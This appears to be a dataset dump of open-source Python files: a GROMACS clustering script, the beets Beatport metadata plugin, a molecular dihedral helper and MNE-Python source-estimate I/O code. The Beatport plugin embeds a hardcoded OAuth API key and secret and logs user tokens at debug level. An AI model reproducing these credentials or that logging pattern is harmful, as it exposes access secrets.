text
stringlengths 12
1.05M
| repo_name
stringlengths 5
86
| path
stringlengths 4
191
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 12
1.05M
| keyword
listlengths 1
23
| text_hash
stringlengths 64
64
|
|---|---|---|---|---|---|---|---|
"""
Example of running optical and contact cluster stuff on gromacs file
"""
from __future__ import absolute_import, division, print_function
import os.path as op
import numpy as np
import numpy.testing as npt
import pdb
import gsd.hoomd
import sys
import clustering as cl
import random
import scipy
import time
#from context import clustering as cl
#from context import smoluchowski as smol
from cdistances import conOptDistanceCython,alignDistancesCython
#import imp
#cl = imp.load_source('cl','/home/rachael/Analysis_and_run_code/analysis/cluster_analysis/clustering/clustering.py')
data_path ='/home/rachael/coarsegraining/CG/active_learning/martini-assembly/dfmi/4_production' #folder where trajectory is
#trajectory should not have any water
#this can be done as follows:
#gmx trjconv -f after_eq.gro -o after_eq_whole.gro -pbc whole -s md.tpr
#choose protein
#gmx trjconv -f md.xtc -o md_whole.xtc -pbc whole -s md.tpr
#choose protein
#grompp -f md_dummy.mdp -c after_eq_whole.gro -p CG_dfmi_prot.top -o md_dummy.tpr
#where md_dummy is the same as the mdp file except with water removed, same
#for the topology file
def run_ang_spread():
"""
Try running on an xtc trajectory (from a pull simulation)
"""
trj = op.join(data_path,'md_whole.xtc')
tpr = op.join(data_path,'md_dummy.tpr')
molno = 100
ats = 33
tstart = 0
ttotal = 4000
cainds = range(12,23)
oainds = range(0,3)
cfname = op.join(data_path,'angle-spread-contact.dat')
ofname = op.join(data_path,'angle-spread-optical.dat')
comIDs = np.array([[12,13,14],[16,17,18],[20,21,22]])
cldict = {'contact':0.5*0.5,'optical':0.7*0.7}
cfname = op.join(data_path,'contact-CIDs.dat')
ofname = op.join(data_path,'optical-CIDs.dat')
start = time.time()
syst = cl.SnapSystem(trj,ats,molno,cldict,compairs=comIDs,
ttotal=ttotal,tstart=tstart,tpr=tpr)
end = time.time()
print("Time to setup: "+str(end-start)+"\n")
start = time.time()
syst.get_clusters_from_file('contact',cfname)
end = time.time()
print("Time to get contact: "+str(end-start)+"\n")
start = time.time()
syst.get_clusters_from_file('optical',ofname)
end = time.time()
print("Time to get optical: "+str(end-start)+"\n")
start = time.time()
syst.writeAngSpread('contact',cfname,cainds)
syst.writeAngSpread('optical',ofname,oainds)
end = time.time()
print("Time to get angle spread: "+str(end-start))
if __name__ == "__main__":
run_ang_spread()
|
ramansbach/cluster_analysis
|
clustering/scripts/analyze_angspread_martini.py
|
Python
|
mit
| 2,547
|
[
"Gromacs"
] |
ff4f871248d9e8633a8ed747e01adc297c89b9786744a71846b6b67c8968ebe8
|
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Adds Beatport release and track search support to the autotagger
"""
from __future__ import division, absolute_import, print_function
import json
import re
import six
from datetime import datetime, timedelta
from requests_oauthlib import OAuth1Session
from requests_oauthlib.oauth1_session import (TokenRequestDenied, TokenMissing,
VerifierMissing)
import beets
import beets.ui
from beets.autotag.hooks import AlbumInfo, TrackInfo, Distance
from beets.plugins import BeetsPlugin
from beets.util import confit
AUTH_ERRORS = (TokenRequestDenied, TokenMissing, VerifierMissing)
USER_AGENT = u'beets/{0} +http://beets.io/'.format(beets.__version__)
class BeatportAPIError(Exception):
pass
class BeatportObject(object):
def __init__(self, data):
self.beatport_id = data['id']
self.name = six.text_type(data['name'])
if 'releaseDate' in data:
self.release_date = datetime.strptime(data['releaseDate'],
'%Y-%m-%d')
if 'artists' in data:
self.artists = [(x['id'], six.text_type(x['name']))
for x in data['artists']]
if 'genres' in data:
self.genres = [six.text_type(x['name'])
for x in data['genres']]
class BeatportClient(object):
_api_base = 'https://oauth-api.beatport.com'
def __init__(self, c_key, c_secret, auth_key=None, auth_secret=None):
""" Initiate the client with OAuth information.
For the initial authentication with the backend `auth_key` and
`auth_secret` can be `None`. Use `get_authorize_url` and
`get_access_token` to obtain them for subsequent uses of the API.
:param c_key: OAuth1 client key
:param c_secret: OAuth1 client secret
:param auth_key: OAuth1 resource owner key
:param auth_secret: OAuth1 resource owner secret
"""
self.api = OAuth1Session(
client_key=c_key, client_secret=c_secret,
resource_owner_key=auth_key,
resource_owner_secret=auth_secret,
callback_uri='oob')
self.api.headers = {'User-Agent': USER_AGENT}
def get_authorize_url(self):
""" Generate the URL for the user to authorize the application.
Retrieves a request token from the Beatport API and returns the
corresponding authorization URL on their end that the user has
to visit.
This is the first step of the initial authorization process with the
API. Once the user has visited the URL, call
:py:method:`get_access_token` with the displayed data to complete
the process.
:returns: Authorization URL for the user to visit
:rtype: unicode
"""
self.api.fetch_request_token(
self._make_url('/identity/1/oauth/request-token'))
return self.api.authorization_url(
self._make_url('/identity/1/oauth/authorize'))
def get_access_token(self, auth_data):
""" Obtain the final access token and secret for the API.
:param auth_data: URL-encoded authorization data as displayed at
the authorization url (obtained via
:py:meth:`get_authorize_url`) after signing in
:type auth_data: unicode
:returns: OAuth resource owner key and secret
:rtype: (unicode, unicode) tuple
"""
self.api.parse_authorization_response(
"http://beets.io/auth?" + auth_data)
access_data = self.api.fetch_access_token(
self._make_url('/identity/1/oauth/access-token'))
return access_data['oauth_token'], access_data['oauth_token_secret']
def search(self, query, release_type='release', details=True):
""" Perform a search of the Beatport catalogue.
:param query: Query string
:param release_type: Type of releases to search for, can be
'release' or 'track'
:param details: Retrieve additional information about the
search results. Currently this will fetch
the tracklist for releases and do nothing for
tracks
:returns: Search results
:rtype: generator that yields
py:class:`BeatportRelease` or
:py:class:`BeatportTrack`
"""
response = self._get('catalog/3/search',
query=query, perPage=5,
facets=['fieldType:{0}'.format(release_type)])
for item in response:
if release_type == 'release':
if details:
release = self.get_release(item['id'])
else:
release = BeatportRelease(item)
yield release
elif release_type == 'track':
yield BeatportTrack(item)
def get_release(self, beatport_id):
""" Get information about a single release.
:param beatport_id: Beatport ID of the release
:returns: The matching release
:rtype: :py:class:`BeatportRelease`
"""
response = self._get('/catalog/3/releases', id=beatport_id)
release = BeatportRelease(response[0])
release.tracks = self.get_release_tracks(beatport_id)
return release
def get_release_tracks(self, beatport_id):
""" Get all tracks for a given release.
:param beatport_id: Beatport ID of the release
:returns: Tracks in the matching release
:rtype: list of :py:class:`BeatportTrack`
"""
response = self._get('/catalog/3/tracks', releaseId=beatport_id)
return [BeatportTrack(t) for t in response]
def get_track(self, beatport_id):
""" Get information about a single track.
:param beatport_id: Beatport ID of the track
:returns: The matching track
:rtype: :py:class:`BeatportTrack`
"""
response = self._get('/catalog/3/tracks', id=beatport_id)
return BeatportTrack(response[0])
def _make_url(self, endpoint):
""" Get complete URL for a given API endpoint. """
if not endpoint.startswith('/'):
endpoint = '/' + endpoint
return self._api_base + endpoint
def _get(self, endpoint, **kwargs):
""" Perform a GET request on a given API endpoint.
Automatically extracts result data from the response and converts HTTP
exceptions into :py:class:`BeatportAPIError` objects.
"""
try:
response = self.api.get(self._make_url(endpoint), params=kwargs)
except Exception as e:
raise BeatportAPIError("Error connecting to Beatport API: {}"
.format(e.message))
if not response:
raise BeatportAPIError(
"Error {0.status_code} for '{0.request.path_url}"
.format(response))
return response.json()['results']
@six.python_2_unicode_compatible
class BeatportRelease(BeatportObject):
def __str__(self):
if len(self.artists) < 4:
artist_str = ", ".join(x[1] for x in self.artists)
else:
artist_str = "Various Artists"
return u"<BeatportRelease: {0} - {1} ({2})>".format(
artist_str,
self.name,
self.catalog_number,
)
def __repr__(self):
return six.text_type(self).encode('utf-8')
def __init__(self, data):
BeatportObject.__init__(self, data)
if 'catalogNumber' in data:
self.catalog_number = data['catalogNumber']
if 'label' in data:
self.label_name = data['label']['name']
if 'category' in data:
self.category = data['category']
if 'slug' in data:
self.url = "http://beatport.com/release/{0}/{1}".format(
data['slug'], data['id'])
@six.python_2_unicode_compatible
class BeatportTrack(BeatportObject):
def __str__(self):
artist_str = ", ".join(x[1] for x in self.artists)
return (u"<BeatportTrack: {0} - {1} ({2})>"
.format(artist_str, self.name, self.mix_name))
def __repr__(self):
return six.text_type(self).encode('utf-8')
def __init__(self, data):
BeatportObject.__init__(self, data)
if 'title' in data:
self.title = six.text_type(data['title'])
if 'mixName' in data:
self.mix_name = six.text_type(data['mixName'])
self.length = timedelta(milliseconds=data.get('lengthMs', 0) or 0)
if not self.length:
try:
min, sec = data.get('length', '0:0').split(':')
self.length = timedelta(minutes=int(min), seconds=int(sec))
except ValueError:
pass
if 'slug' in data:
self.url = "http://beatport.com/track/{0}/{1}".format(data['slug'],
data['id'])
self.track_number = data.get('trackNumber')
class BeatportPlugin(BeetsPlugin):
def __init__(self):
super(BeatportPlugin, self).__init__()
self.config.add({
'apikey': '57713c3906af6f5def151b33601389176b37b429',
'apisecret': 'b3fe08c93c80aefd749fe871a16cd2bb32e2b954',
'tokenfile': 'beatport_token.json',
'source_weight': 0.5,
})
self.config['apikey'].redact = True
self.config['apisecret'].redact = True
self.client = None
self.register_listener('import_begin', self.setup)
def setup(self, session=None):
c_key = self.config['apikey'].as_str()
c_secret = self.config['apisecret'].as_str()
# Get the OAuth token from a file or log in.
try:
with open(self._tokenfile()) as f:
tokendata = json.load(f)
except IOError:
# No token yet. Generate one.
token, secret = self.authenticate(c_key, c_secret)
else:
token = tokendata['token']
secret = tokendata['secret']
self.client = BeatportClient(c_key, c_secret, token, secret)
def authenticate(self, c_key, c_secret):
# Get the link for the OAuth page.
auth_client = BeatportClient(c_key, c_secret)
try:
url = auth_client.get_authorize_url()
except AUTH_ERRORS as e:
self._log.debug(u'authentication error: {0}', e)
raise beets.ui.UserError(u'communication with Beatport failed')
beets.ui.print_(u"To authenticate with Beatport, visit:")
beets.ui.print_(url)
# Ask for the verifier data and validate it.
data = beets.ui.input_(u"Enter the string displayed in your browser:")
try:
token, secret = auth_client.get_access_token(data)
except AUTH_ERRORS as e:
self._log.debug(u'authentication error: {0}', e)
raise beets.ui.UserError(u'Beatport token request failed')
# Save the token for later use.
self._log.debug(u'Beatport token {0}, secret {1}', token, secret)
with open(self._tokenfile(), 'w') as f:
json.dump({'token': token, 'secret': secret}, f)
return token, secret
def _tokenfile(self):
"""Get the path to the JSON file for storing the OAuth token.
"""
return self.config['tokenfile'].get(confit.Filename(in_app_dir=True))
def album_distance(self, items, album_info, mapping):
"""Returns the beatport source weight and the maximum source weight
for albums.
"""
dist = Distance()
if album_info.data_source == 'Beatport':
dist.add('source', self.config['source_weight'].as_number())
return dist
def track_distance(self, item, track_info):
"""Returns the beatport source weight and the maximum source weight
for individual tracks.
"""
dist = Distance()
if track_info.data_source == 'Beatport':
dist.add('source', self.config['source_weight'].as_number())
return dist
def candidates(self, items, artist, release, va_likely):
"""Returns a list of AlbumInfo objects for beatport search results
matching release and artist (if not various).
"""
if va_likely:
query = release
else:
query = '%s %s' % (artist, release)
try:
return self._get_releases(query)
except BeatportAPIError as e:
self._log.debug(u'API Error: {0} (query: {1})', e, query)
return []
def item_candidates(self, item, artist, title):
"""Returns a list of TrackInfo objects for beatport search results
matching title and artist.
"""
query = '%s %s' % (artist, title)
try:
return self._get_tracks(query)
except BeatportAPIError as e:
self._log.debug(u'API Error: {0} (query: {1})', e, query)
return []
def album_for_id(self, release_id):
"""Fetches a release by its Beatport ID and returns an AlbumInfo object
or None if the release is not found.
"""
self._log.debug(u'Searching for release {0}', release_id)
match = re.search(r'(^|beatport\.com/release/.+/)(\d+)$', release_id)
if not match:
return None
release = self.client.get_release(match.group(2))
album = self._get_album_info(release)
return album
def track_for_id(self, track_id):
"""Fetches a track by its Beatport ID and returns a TrackInfo object
or None if the track is not found.
"""
self._log.debug(u'Searching for track {0}', track_id)
match = re.search(r'(^|beatport\.com/track/.+/)(\d+)$', track_id)
if not match:
return None
bp_track = self.client.get_track(match.group(2))
track = self._get_track_info(bp_track)
return track
def _get_releases(self, query):
"""Returns a list of AlbumInfo objects for a beatport search query.
"""
# Strip non-word characters from query. Things like "!" and "-" can
# cause a query to return no results, even if they match the artist or
# album title. Use `re.UNICODE` flag to avoid stripping non-english
# word characters.
query = re.sub(r'\W+', ' ', query, re.UNICODE)
# Strip medium information from query, Things like "CD1" and "disk 1"
# can also negate an otherwise positive result.
query = re.sub(r'\b(CD|disc)\s*\d+', '', query, re.I)
albums = [self._get_album_info(x)
for x in self.client.search(query)]
return albums
def _get_album_info(self, release):
"""Returns an AlbumInfo object for a Beatport Release object.
"""
va = len(release.artists) > 3
artist, artist_id = self._get_artist(release.artists)
if va:
artist = u"Various Artists"
tracks = [self._get_track_info(x) for x in release.tracks]
return AlbumInfo(album=release.name, album_id=release.beatport_id,
artist=artist, artist_id=artist_id, tracks=tracks,
albumtype=release.category, va=va,
year=release.release_date.year,
month=release.release_date.month,
day=release.release_date.day,
label=release.label_name,
catalognum=release.catalog_number, media=u'Digital',
data_source=u'Beatport', data_url=release.url)
def _get_track_info(self, track):
"""Returns a TrackInfo object for a Beatport Track object.
"""
title = track.name
if track.mix_name != u"Original Mix":
title += u" ({0})".format(track.mix_name)
artist, artist_id = self._get_artist(track.artists)
length = track.length.total_seconds()
return TrackInfo(title=title, track_id=track.beatport_id,
artist=artist, artist_id=artist_id,
length=length, index=track.track_number,
medium_index=track.track_number,
data_source=u'Beatport', data_url=track.url)
def _get_artist(self, artists):
"""Returns an artist string (all artists) and an artist_id (the main
artist) for a list of Beatport release or track artists.
"""
artist_id = None
bits = []
for artist in artists:
if not artist_id:
artist_id = artist[0]
name = artist[1]
# Strip disambiguation number.
name = re.sub(r' \(\d+\)$', '', name)
# Move articles to the front.
name = re.sub(r'^(.*?), (a|an|the)$', r'\2 \1', name, flags=re.I)
bits.append(name)
artist = ', '.join(bits).replace(' ,', ',') or None
return artist, artist_id
def _get_tracks(self, query):
"""Returns a list of TrackInfo objects for a Beatport query.
"""
bp_tracks = self.client.search(query, release_type='track')
tracks = [self._get_track_info(x) for x in bp_tracks]
return tracks
|
MyTunesFreeMusic/privacy-policy
|
beetsplug/beatport.py
|
Python
|
mit
| 18,362
|
[
"VisIt"
] |
d873c5c58d243d63c2f37da8cbf1fa8371d7e72664a6738813a55a45158cf597
|
import bond
class Dihedral(object):
"""Docstring for Dihedral"""
dihedral_eqib_len = ""
dihedral_force_const = ""
dihedral_master1 = ""
dihedral_master2 = ""
dihedral_slave1 = ""
dihedral_slave2 = ""
k1 = ""
k2 = ""
k3 = ""
k4 = ""
print_type = 0
dft = False
intermono = False
def __init__(self, dihedral_master1, dihedral_master2, dihedral_slave1, dihedral_slave2):
self.dihedral_master1 = dihedral_master1
self.dihedral_master2 = dihedral_master2
self.dihedral_slave1 = dihedral_slave1
self.dihedral_slave2 = dihedral_slave2
def get_unique(dihedrals):
""" Remove duplicate dihedrals
Keyword Arguments:
dihedrals - List of dihedrals to remove duplicates from
"""
dihedrals_new = []
for i in range(0,len(dihedrals)):
for j in range(0,len(dihedrals)):
if dihedrals[i] == dihedrals[j]:
continue
if dihedrals[i].dihedral_master1 == dihedrals[j].dihedral_master2 and dihedrals[i].dihedral_master2 == dihedrals[j].dihedral_master1:
if dihedrals[i].dihedral_slave1 == dihedrals[j].dihedral_slave2 and dihedrals[i].dihedral_slave2 == dihedrals[j].dihedral_slave1:
dihedrals_new.append(dihedrals[j])
dihedrals_new = remove_duplicates(dihedrals_new)
for i in range(0,len(dihedrals_new)):
dihedrals.remove(dihedrals_new[i])
return dihedrals
def remove_duplicates(l):
""" Given any list remove the duplicates from it
Keyword Arguments:
l - Any list that you want to remove duplicates from
"""
return list(set(l))
def create_dihedrals(dihedral,all=False):
""" Creates the dihedral objects
Keyword Arguments:
dihedral - A list of angles to create dihedral from
"""
dihedrals = []
for i in range(0,len(dihedral)):
outlist = [dihedral[i].Angle_master,dihedral[i].Angle_slave1,dihedral[i].Angle_slave2]
for j in range(0,len(dihedral)):
if dihedral[i] == dihedral[j]:
continue
inF = [dihedral[j].Angle_master,dihedral[j].Angle_slave1]
inS = [dihedral[j].Angle_slave1,dihedral[j].Angle_slave2]
inFL = [dihedral[j].Angle_master,dihedral[j].Angle_slave2]
if outlist[0] in inF and outlist[1] in inF:
dihedrals.append(Dihedral(outlist[0],outlist[1],outlist[2],inS[1]))
outlist[0].dihedral = True
outlist[1].dihedral = True
elif outlist[0] in inS and outlist[1] in inS:
dihedrals.append(Dihedral(outlist[0],outlist[1],outlist[2],inF[0]))
outlist[0].dihedral = True
outlist[1].dihedral = True
elif outlist[0] in inFL and outlist[1] in inFL:
dihedrals.append(Dihedral(outlist[0],outlist[1],outlist[2],inS[0]))
outlist[0].dihedral = True
outlist[1].dihedral = True
dihedrals = get_unique(dihedrals)
return dihedrals
def find_dihedral(master,slave,dihedrals):
""" Given a master and slave atom finds the dihedral that they master together.
Keyword Arguments:
master - The atom master you want to use in conjunction with the slave master to find the dihedral
slave - The slave master you want to using in conjunction with the master to find the dihedral
dihedrals - The list of dihedrals you want to check for this pair of masters
"""
for i in range(len(dihedrals)):
if dihedrals[i].dihedral_master1 == master and dihedrals[i].dihedral_master2 == slave:
return dihedrals[i]
if dihedrals[i].dihedral_master1 == slave and dihedrals[i].dihedral_master2 == master:
return dihedrals[i]
def set_opls(dihedrals,opls_dihedrals):
""" Sets the opls data into the dihedral object
Keyword Arguments:
dihedrals - The list of dihedral objects to set opls data into
opls_dihedrals - The list of opls data to scan
"""
for i in range(len(dihedrals)):
masters = [int(dihedrals[i].dihedral_master1.opls_bondid),int(dihedrals[i].dihedral_master2.opls_bondid)]
slaves = [int(dihedrals[i].dihedral_slave1.opls_bondid),int(dihedrals[i].dihedral_slave2.opls_bondid)]
masters.sort()
slaves.sort()
both = [str(slaves[0]),str(masters[0]),str(masters[1]),str(slaves[1])]
for j in range(len(opls_dihedrals)):
if both[0] == opls_dihedrals[j].opls_slave1 and both[1] == opls_dihedrals[j].opls_master1 and both[2] == opls_dihedrals[j].opls_master2 and both[3] == opls_dihedrals[j].opls_slave2:
dihedrals[i].k1 = opls_dihedrals[j].k1
dihedrals[i].k2 = opls_dihedrals[j].k2
dihedrals[i].k3 = opls_dihedrals[j].k3
dihedrals[i].k4 = opls_dihedrals[j].k4
def uniq_types(dihedrals):
""" Gets the unique type of dihedrals for lammps output
Keyword Arguments:
dihedrals - The list of dihedral objects to get unique types from
"""
uniq = []
uniqadd = []
for i in range(len(dihedrals)):
if [dihedrals[i].k1,dihedrals[i].k2,dihedrals[i].k3,dihedrals[i].k4] in uniqadd:
continue
if dihedrals[i].k1 == "":
continue
uniqadd.append([dihedrals[i].k1,dihedrals[i].k2,dihedrals[i].k3,dihedrals[i].k4])
uniq.append(dihedrals[i])
return uniq
def get_type(dihedral,type):
""" Gets the type of unique dihedral it is for lammps output
Keyword Arguments:
dihedral - The list of dihedral objects
type - The list of unique types
"""
for i in range(len(dihedral)):
for j in range(len(type)):
if dihedral[i].k1 == type[j].k1 and dihedral[i].k2 == type[j].k2 and dihedral[i].k3 == type[j].k3 and dihedral[i].k4 == type[j].k4:
dihedral[i].print_type = j+1
def set_dft(dihedral,bonds):
""" Given a list of dihedrals find if you should set dft values for those dihedrals or not.
Sets a boolean on the list of dihedrals that need dft calculations done to them.
Probably should return a list instead for speed optimization
Keyword Arguments:
dihedral - The list of dihedrals you want to check
bonds - The list of bonds you want to check
"""
for i in range(len(dihedral)):
mb1 = bond.get_bond(dihedral[i].dihedral_master1,dihedral[i].dihedral_master2,bonds)
if mb1.bond_type == '1':
ob1 = bond.get_bond(dihedral[i].dihedral_master1,dihedral[i].dihedral_slave1,bonds)
ob2 = bond.get_bond(dihedral[i].dihedral_master2,dihedral[i].dihedral_slave2,bonds)
if ob1 == None or ob2 == None:
continue
if ob1.bond_type == '2' and ob2.bond_type == '2':
dihedral[i].dft = True
|
sipjca/cmlparser_py
|
dihedral.py
|
Python
|
apache-2.0
| 6,904
|
[
"LAMMPS"
] |
5ba389fa63116c8de9e96e842adb2da08e8b31e4528316852ba16156091708db
|
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
# Mads Jensen <mje.mads@gmail.com>
#
# License: BSD (3-clause)
import os
import copy
from math import ceil
import warnings
import numpy as np
from scipy import linalg, sparse
from scipy.sparse import coo_matrix
from .filter import resample
from .evoked import _get_peak
from .parallel import parallel_func
from .surface import (read_surface, _get_ico_surface, read_morph_map,
_compute_nearest, mesh_edges)
from .source_space import (_ensure_src, _get_morph_src_reordering,
_ensure_src_subject)
from .utils import (get_subjects_dir, _check_subject, logger, verbose,
_time_mask)
from .viz import plot_source_estimates
from .fixes import in1d, sparse_block_diag
from .io.base import ToDataFrameMixin
from .externals.six.moves import zip
from .externals.six import string_types
from .externals.h5io import read_hdf5, write_hdf5
def _read_stc(filename):
""" Aux Function
"""
fid = open(filename, 'rb')
stc = dict()
fid.seek(0, 2) # go to end of file
file_length = fid.tell()
fid.seek(0, 0) # go to beginning of file
# read tmin in ms
stc['tmin'] = float(np.fromfile(fid, dtype=">f4", count=1))
stc['tmin'] /= 1000.0
# read sampling rate in ms
stc['tstep'] = float(np.fromfile(fid, dtype=">f4", count=1))
stc['tstep'] /= 1000.0
# read number of vertices/sources
vertices_n = int(np.fromfile(fid, dtype=">u4", count=1))
# read the source vector
stc['vertices'] = np.fromfile(fid, dtype=">u4", count=vertices_n)
# read the number of timepts
data_n = int(np.fromfile(fid, dtype=">u4", count=1))
if (vertices_n and # vertices_n can be 0 (empty stc)
((file_length / 4 - 4 - vertices_n) % (data_n * vertices_n)) != 0):
raise ValueError('incorrect stc file size')
# read the data matrix
stc['data'] = np.fromfile(fid, dtype=">f4", count=vertices_n * data_n)
stc['data'] = stc['data'].reshape([data_n, vertices_n]).T
# close the file
fid.close()
return stc
def _write_stc(filename, tmin, tstep, vertices, data):
"""Write an STC file
Parameters
----------
filename : string
The name of the STC file.
tmin : float
The first time point of the data in seconds.
tstep : float
Time between frames in seconds.
vertices : array of integers
Vertex indices (0 based).
data : 2D array
The data matrix (nvert * ntime).
"""
fid = open(filename, 'wb')
# write start time in ms
fid.write(np.array(1000 * tmin, dtype='>f4').tostring())
# write sampling rate in ms
fid.write(np.array(1000 * tstep, dtype='>f4').tostring())
# write number of vertices
fid.write(np.array(vertices.shape[0], dtype='>u4').tostring())
# write the vertex indices
fid.write(np.array(vertices, dtype='>u4').tostring())
# write the number of timepts
fid.write(np.array(data.shape[1], dtype='>u4').tostring())
#
# write the data
#
fid.write(np.array(data.T, dtype='>f4').tostring())
# close the file
fid.close()
def _read_3(fid):
""" Read 3 byte integer from file
"""
data = np.fromfile(fid, dtype=np.uint8, count=3).astype(np.int32)
out = np.left_shift(data[0], 16) + np.left_shift(data[1], 8) + data[2]
return out
def _read_w(filename):
"""Read a w file and return as dict
w files contain activations or source reconstructions for a single time
point.
Parameters
----------
filename : string
The name of the w file.
Returns
-------
data: dict
The w structure. It has the following keys:
vertices vertex indices (0 based)
data The data matrix (nvert long)
"""
with open(filename, 'rb', buffering=0) as fid: # buffering=0 for np bug
# skip first 2 bytes
fid.read(2)
# read number of vertices/sources (3 byte integer)
vertices_n = int(_read_3(fid))
vertices = np.zeros((vertices_n), dtype=np.int32)
data = np.zeros((vertices_n), dtype=np.float32)
# read the vertices and data
for i in range(vertices_n):
vertices[i] = _read_3(fid)
data[i] = np.fromfile(fid, dtype='>f4', count=1)[0]
w = dict()
w['vertices'] = vertices
w['data'] = data
return w
def _write_3(fid, val):
""" Write 3 byte integer to file
"""
f_bytes = np.zeros((3), dtype=np.uint8)
f_bytes[0] = (val >> 16) & 255
f_bytes[1] = (val >> 8) & 255
f_bytes[2] = val & 255
fid.write(f_bytes.tostring())
def _write_w(filename, vertices, data):
"""Read a w file
w files contain activations or source reconstructions for a single time
point.
Parameters
----------
filename: string
The name of the w file.
vertices: array of int
Vertex indices (0 based).
data: 1D array
The data array (nvert).
"""
assert(len(vertices) == len(data))
fid = open(filename, 'wb')
# write 2 zero bytes
fid.write(np.zeros((2), dtype=np.uint8).tostring())
# write number of vertices/sources (3 byte integer)
vertices_n = len(vertices)
_write_3(fid, vertices_n)
# write the vertices and data
for i in range(vertices_n):
_write_3(fid, vertices[i])
# XXX: without float() endianness is wrong, not sure why
fid.write(np.array(float(data[i]), dtype='>f4').tostring())
# close the file
fid.close()
def read_source_estimate(fname, subject=None):
"""Read a soure estimate object
Parameters
----------
fname : str
Path to (a) source-estimate file(s).
subject : str | None
Name of the subject the source estimate(s) is (are) from.
It is good practice to set this attribute to avoid combining
incompatible labels and SourceEstimates (e.g., ones from other
subjects). Note that due to file specification limitations, the
subject name isn't saved to or loaded from files written to disk.
Returns
-------
stc : SourceEstimate | VolSourceEstimate
The soure estimate object loaded from file.
Notes
-----
- for volume source estimates, ``fname`` should provide the path to a
single file named '*-vl.stc` or '*-vol.stc'
- for surface source estimates, ``fname`` should either provide the
path to the file corresponding to a single hemisphere ('*-lh.stc',
'*-rh.stc') or only specify the asterisk part in these patterns. In any
case, the function expects files for both hemisphere with names
following this pattern.
- for single time point .w files, ``fname`` should follow the same
pattern as for surface estimates, except that files are named
'*-lh.w' and '*-rh.w'.
"""
fname_arg = fname
# make sure corresponding file(s) can be found
ftype = None
if os.path.exists(fname):
if fname.endswith('-vl.stc') or fname.endswith('-vol.stc') or \
fname.endswith('-vl.w') or fname.endswith('-vol.w'):
ftype = 'volume'
elif fname.endswith('.stc'):
ftype = 'surface'
if fname.endswith(('-lh.stc', '-rh.stc')):
fname = fname[:-7]
else:
err = ("Invalid .stc filename: %r; needs to end with "
"hemisphere tag ('...-lh.stc' or '...-rh.stc')"
% fname)
raise IOError(err)
elif fname.endswith('.w'):
ftype = 'w'
if fname.endswith(('-lh.w', '-rh.w')):
fname = fname[:-5]
else:
err = ("Invalid .w filename: %r; needs to end with "
"hemisphere tag ('...-lh.w' or '...-rh.w')"
% fname)
raise IOError(err)
elif fname.endswith('-stc.h5'):
ftype = 'h5'
fname = fname[:-7]
else:
raise RuntimeError('Unknown extension for file %s' % fname_arg)
if ftype is not 'volume':
stc_exist = [os.path.exists(f)
for f in [fname + '-rh.stc', fname + '-lh.stc']]
w_exist = [os.path.exists(f)
for f in [fname + '-rh.w', fname + '-lh.w']]
h5_exist = os.path.exists(fname + '-stc.h5')
if all(stc_exist) and (ftype is not 'w'):
ftype = 'surface'
elif all(w_exist):
ftype = 'w'
elif h5_exist:
ftype = 'h5'
elif any(stc_exist) or any(w_exist):
raise IOError("Hemisphere missing for %r" % fname_arg)
else:
raise IOError("SourceEstimate File(s) not found for: %r"
% fname_arg)
# read the files
if ftype == 'volume': # volume source space
if fname.endswith('.stc'):
kwargs = _read_stc(fname)
elif fname.endswith('.w'):
kwargs = _read_w(fname)
kwargs['data'] = kwargs['data'][:, np.newaxis]
kwargs['tmin'] = 0.0
kwargs['tstep'] = 0.0
else:
raise IOError('Volume source estimate must end with .stc or .w')
elif ftype == 'surface': # stc file with surface source spaces
lh = _read_stc(fname + '-lh.stc')
rh = _read_stc(fname + '-rh.stc')
assert lh['tmin'] == rh['tmin']
assert lh['tstep'] == rh['tstep']
kwargs = lh.copy()
kwargs['data'] = np.r_[lh['data'], rh['data']]
kwargs['vertices'] = [lh['vertices'], rh['vertices']]
elif ftype == 'w': # w file with surface source spaces
lh = _read_w(fname + '-lh.w')
rh = _read_w(fname + '-rh.w')
kwargs = lh.copy()
kwargs['data'] = np.atleast_2d(np.r_[lh['data'], rh['data']]).T
kwargs['vertices'] = [lh['vertices'], rh['vertices']]
# w files only have a single time point
kwargs['tmin'] = 0.0
kwargs['tstep'] = 1.0
elif ftype == 'h5':
kwargs = read_hdf5(fname + '-stc.h5', title='mnepython')
if ftype != 'volume':
# Make sure the vertices are ordered
vertices = kwargs['vertices']
if any(np.any(np.diff(v.astype(int)) <= 0) for v in vertices):
sidx = [np.argsort(verts) for verts in vertices]
vertices = [verts[idx] for verts, idx in zip(vertices, sidx)]
data = kwargs['data'][np.r_[sidx[0], len(sidx[0]) + sidx[1]]]
kwargs['vertices'] = vertices
kwargs['data'] = data
if 'subject' not in kwargs:
kwargs['subject'] = subject
if subject is not None and subject != kwargs['subject']:
raise RuntimeError('provided subject name "%s" does not match '
'subject name from the file "%s'
% (subject, kwargs['subject']))
if ftype == 'volume':
stc = VolSourceEstimate(**kwargs)
else:
stc = SourceEstimate(**kwargs)
return stc
def _make_stc(data, vertices, tmin=None, tstep=None, subject=None):
"""Helper function to generate a surface, volume or mixed source estimate
"""
if isinstance(vertices, list) and len(vertices) == 2:
# make a surface source estimate
stc = SourceEstimate(data, vertices=vertices, tmin=tmin, tstep=tstep,
subject=subject)
elif isinstance(vertices, np.ndarray) or isinstance(vertices, list)\
and len(vertices) == 1:
stc = VolSourceEstimate(data, vertices=vertices, tmin=tmin,
tstep=tstep, subject=subject)
elif isinstance(vertices, list) and len(vertices) > 2:
# make a mixed source estimate
stc = MixedSourceEstimate(data, vertices=vertices, tmin=tmin,
tstep=tstep, subject=subject)
else:
raise ValueError('vertices has to be either a list with one or more '
'arrays or an array')
return stc
def _verify_source_estimate_compat(a, b):
"""Make sure two SourceEstimates are compatible for arith. operations"""
compat = False
if len(a.vertices) == len(b.vertices):
if all(np.array_equal(av, vv)
for av, vv in zip(a.vertices, b.vertices)):
compat = True
if not compat:
raise ValueError('Cannot combine SourceEstimates that do not have the '
'same vertices. Consider using stc.expand().')
